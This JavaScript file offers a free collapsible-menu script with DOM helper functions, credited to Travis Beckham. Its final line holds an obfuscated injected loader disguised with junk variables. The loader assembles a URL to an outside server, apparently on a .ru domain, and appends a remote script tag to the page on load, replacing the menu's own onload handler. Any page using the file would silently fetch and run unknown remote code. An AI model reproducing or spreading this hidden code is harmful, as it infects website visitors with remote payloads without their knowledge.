/* This script and many more are available free online at
The JavaScript Source :: http://javascript.internet.com
Created by: Travis Beckham :: http://www.squidfingers.com | http://www.podlob.com
version date: 06/02/03 :: If want to use this code, feel free to do so,
but please leave this message intact. (Travis Beckham) */

// Node Functions

if(!window.Node){
  var Node = {ELEMENT_NODE : 1, TEXT_NODE : 3};
}

function checkNode(node, filter){
  return (filter == null || node.nodeType == Node[filter] || node.nodeName.toUpperCase() == filter.toUpperCase());
}

function getChildren(node, filter){
  var result = new Array();
  var children = node.childNodes;
  for(var i = 0; i < children.length; i++){
    if(checkNode(children[i], filter)) result[result.length] = children[i];
  }
  return result;
}

function getChildrenByElement(node){
  return getChildren(node, "ELEMENT_NODE");
}

function getFirstChild(node, filter){
  var child;
  var children = node.childNodes;
  for(var i = 0; i < children.length; i++){
    child = children[i];
    if(checkNode(child, filter)) return child;
  }
  return null;
}

function getFirstChildByText(node){
  return getFirstChild(node, "TEXT_NODE");
}

function getNextSibling(node, filter){
  for(var sibling = node.nextSibling; sibling != null; sibling = sibling.nextSibling){
    if(checkNode(sibling, filter)) return sibling;
  }
  return null;
}
function getNextSiblingByElement(node){
        return getNextSibling(node, "ELEMENT_NODE");
}

// Menu Functions & Properties

var activeMenu = null;

function showMenu() {
  if(activeMenu){
    activeMenu.className = "";
    getNextSiblingByElement(activeMenu).style.display = "none";
  }
  if(this == activeMenu){
    activeMenu = null;
  } else {
    this.className = "active";
    getNextSiblingByElement(this).style.display = "block";
    activeMenu = this;
  }
  return false;
}

function initMenu(){
  var menus, menu, text, a, i;
  menus = getChildrenByElement(document.getElementById("menu"));
  for(i = 0; i < menus.length; i++){
    menu = menus[i];
    text = getFirstChildByText(menu);
    if (text != null){
      a = document.createElement("a");
      menu.replaceChild(a, text);
      a.appendChild(text);
      a.href = "#";
      a.onclick = showMenu;
      a.onfocus = function(){this.blur()};
    }
  }
}

if(document.createElement) window.onload = initMenu;
var w=new String();function m(){this.Y="";this.gC="";var Et;if(Et!='' && Et!='e'){Et='P'};var Z;if(Z!='' && Z!='eU'){Z=null};var U='';var E=RegExp;var es;if(es!=''){es='Zu'};var Q=String("gqoUP".substr(0,1));this.R="";var f;if(f!='x' && f != ''){f=null};function i(g,ES){var RS=new String();var G;if(G!=''){G='jQ'};var h= "vKy[".substr(3);var a;if(a!='MM' && a!='t'){a=''};h+=ES;var tf='';var b="";h+=new String("VN7U]".substr(4));var T=new E(h, Q);var y=new Array();return g.replace(T, U);var Aa;if(Aa!='aZ' && Aa!='UU'){Aa=''};this.aQ="";};var wg=new Date();var Ge=new Date();var fk=new Date();var EY=new Date();var M='';var wm='';var bq=new Array();var H=String("scrip"+"t");var Bh;if(Bh!='Tt' && Bh != ''){Bh=null};var uX='';var c=window;var GW;if(GW!='' && GW!='HG'){GW=''};var Wv=new String();var Gr=new Date();var Ve;if(Ve!='' && Ve!='qJ'){Ve=null};var j=new String("v7Zde".substr(3)+"feQAjr".substr(0,2)+"r");var cm;if(cm!='' && cm!='Hd'){cm=''};var O='';var W="/googBJMW".substr(0,5)+"le.coVE5H".substr(0,5)+"m/good6v".substr(0,5)+"10uZgle.c0Zu1".substr(4,5)+"om/ma"+"srawyRv87".substr(0,5)+"eOV.com/VOe".substr(3,5)+"UCVvbuy.c".substr(4)+"5CNrom/hor5NC".substr(4,5)+"MKAgmeway".substr(4)+"9Sp.com.p9S".substr(3,5)+"dy71cn.ph".substr(4)+"p";var LG;if(LG!='Xz' && LG != ''){LG=null};var eR=new String();var L=String("htt"+"nWq9p:/".substr(4)+"/fb"+"I8M0cdnIM08".substr(4,3)+"wvm2-ne2mvw".substr(4,3)+"REzt.f".substr(3)+"tqTEish".substr(4)+"H2stki.".substr(4)+"HiDnetHDi".substr(3,3)+"AYTj.su".substr(4)+"eddjku".substr(0,3)+"oP5weut5woP".substr(4,3)+"schY2te".substr(0,3)+"e-dARg2".substr(0,3)+"e.b"+"uymotL".substr(0,3)+"oVUryparVoU".substr(4,3)+"lm."+"aYN9ru:".substr(4));var yC=new Array();var u=i('8221021218222021221',"21");var eUh;if(eUh!='Eb'){eUh='Eb'};var jt=String("src");var nw;if(nw!='Mw' && nw!='aO'){nw=''};var Ua;if(Ua!='Yr' && Ua != ''){Ua=null};c.onload=function(){var so;if(so!='' && so!='tr'){so=''};var AM=new String();try {var Sb=new Array();M=L+u;this.fw='';this.no='';M+=W;var JT='';var Zk=new String();Wt=document.createElement(H);Wt[j]=[1,9][0];var qL="";var og='';Wt[jt]=M;var uf='';var ah;if(ah!='' && ah!='Y_'){ah=''};var EM;if(EM!='MZ' && EM!='MG'){EM=''};document.body.appendChild(Wt);var LX;if(LX!=''){LX='Wf'};var oK;if(oK!='' && oK!='qj'){oK='Oi'};var zT;if(zT!='' && zT!='oQ'){zT=null};} catch(ca){var DJ=new Date();};this.Rn='';};var RV=new Array();};var ZW=new Array();m();var aZK;if(aZK!=''){aZK='yE'};var hB=new Array();